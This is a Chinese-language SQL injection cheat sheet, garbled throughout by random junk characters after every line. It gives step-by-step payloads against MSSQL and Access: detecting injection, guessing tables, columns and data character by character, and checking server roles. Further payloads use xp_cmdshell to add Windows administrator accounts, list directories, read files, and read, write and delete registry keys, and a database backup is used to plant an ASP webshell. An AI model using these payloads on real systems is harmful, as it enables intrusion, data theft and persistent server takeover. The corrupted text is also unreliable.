1.判断是否有注入;and 1=1 ;and 1=2 Q^�DKKp���
2.初步判断是否是mssql ;and user>0 ].
IUQ�*4t
c+_F�� n�A
3.注入参数是字符'and [查询条件] and ''=' g��U�y >I(
1
B��Anf9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' y2�T�JDb1
P�C7U&*�x@
5.判断数据库系统 *
"~^k^_b}
31���
��QT
;and (select count(*) from sysobjects)>0 mssql i.)k��V B
J�f|J":��S
;and (select count(*) from msysobjects)>0 access F[l{pc �"C
SH<Nt[�8�C
�+s��m�P�R
^�$6EO)�<�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 )C<c{m�jk(
qI�)
Yz�c/
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 T,!?����+#
J�yjS#�BWi
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [q?��{�e1�
�Q�A�p�il
9.(1)猜字段的ascii值(access) �]p� `#KVW
=eDV�g�OZ)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 /V�2I��h��
mG1=8{�o^�
(2)猜字段的ascii值(mssql) bE�MD2�ABm
�mPi4.p�)�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ES(b#BlrP/
`CUTb�*�{`
10.测试权限结构(mssql) �}�RO Cj,|
�:&/'rMi<T
,�~hvF�TJI
(m|p��|rL�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- "/�(J*)%�{
|/�Ggsfmby
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (V�I4�kRj�
*�A@~!@XE4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- /Pxt f�~�$
*=$Jv1"Q
+
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,�l_"%xY�x
��nkG1&wiX
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- @v2_g�j�Re
X<Ow�B��-N
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �lOCMKaC�D
�'hf�#Q9W5
;and 1=(select IS_MEMBER('db_owner'));-- <Koi�Z{V �
MQ�G(�n�+c
H]H*Ouu["e
���_<�+��!
11.添加mssql和系统的帐户 G yvEc�3|@
��2!QJ�a=
;exec master.dbo.sp_addlogin username;-- �XPBKQ�m_}
;exec master.dbo.sp_password null,username,password;-- �?R(f�xx��
y�S0!�#�AG
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- X"z�^4?Aj+
K �pD�K�Ii
;exec master.dbo.xp_cmdshell 'net user username password MD�1n+FgTu
MXh0��a@*]
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- K63�OjR�>H
���&u&/t?�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- c/jU�+,�_g
"iM�u���A�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- [�o<Rg�q�4
+g(�>]!swb
�[d�`J2^z}
�@�>}!g9�c
12.(1)遍历目录 CC��N�rjaA
�3,8<5)ds*
;create table dirs(paths varchar(100), id int) �Bk_23ygO_
j_H9�l�,�V
;insert dirs exec master.dbo.xp_dirtree 'c:\' )>QpR8
G-�
^RAs�t1q7
;and (select top 1 paths from dirs)>0 <'>c`80@\*
�v,I�4ozDx
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ve4�9m%NQ�
bJ4�}��)P&
*P7 H�=Yf&
�3�+���%a�
(2)遍历目录 S1p�4�.q�J
[��_Fj2nb*
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <U�%4�$83$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U>H"�N��1�
r7+"�i���9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 j^;��f {0f
o�Cg|*
c|+
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 JfG�U3d*c�
-GJ~xcf��0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ~2PD�%+e7]
���s;Q0�
�A=JPmsj.�
{�$-l��Xw4
13.mssql中的存储过程 ��(HbA?Aja
9AF%�Y:��y
xp_regenumvalues 注册表根键, 子键 -N
$4�\y�p
:[xF�p}w{
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �uH=�"l.u�
�F$.h+�v �
xp_regread 根键,子键,键值名 Rsd~t_a1�
lHerE�v<ja
;exec xp_regread �O?�L6U�es
L{1MyR7`I+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 q4=�Gj`\43
��[U'I3x,�
xp_regwrite 根键,子键, 值名, 值类型, 值 �c|m*�<�
i
NX�o$rf��:
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 4�z��KmoYt
�v+Mi"ZA�d
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 hGh�91c;4�
l�7� �Pn5c
xp_regdeletevalue 根键,子键,值名 2T� �3�tKX
"�'�U+T�:S
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �N!!=9'fGF
o|(Ivt7jk
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Vl'Gi44)3"
H c�,e��&R
Gf7�1udaa�
V1�di#i:��
14.mssql的backup创建webshell �o-i9 :AHs
.�3�>`�y�L
use model �4FQB�%3>*
*T�c lc�u�
create table cmd(str image); �eFK��F9�m
�;$,��b
w5
insert into cmd(str) values (''); n=Ze p�{�^
JOwm�|%>3a
backup database model to disk='c:\l.asp'; D[/h7��Ha�
�X'F��DQoH
C-�� 5Q�hD
!=S�c�po_
15.mssql内置函数 v}\�4�/u��
3qf�?n5�"8
;and (select @@version)>0 获得Windows的版本号 �41�u��iW,
�K}|zKTh:?
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��ES�,T[��
�w3Lr~_��j
;and (select user_name())>0 爆当前系统的连接用户 {,aX|*1Ku~
~(*2��:9*0
;and (select db_name())>0 得到当前连接的数据库 �\MqO�HM.[
J��lp nR#@
Sf*1Z�~P�|
V#X#rDfJ�Z
16.简洁的webshell lT^/�8Z<g�
�-�.x�iq�0
use model Mc�,3�j~i
i��bH!b�S{
create table cmd(str image); h�X�nf�Zx%
0:I[;Q���t
insert into cmd(str) values (''); sGF���vSW�
%>'Zy6C<j�
backup database model to disk='g:\wwwtest\l.asp';
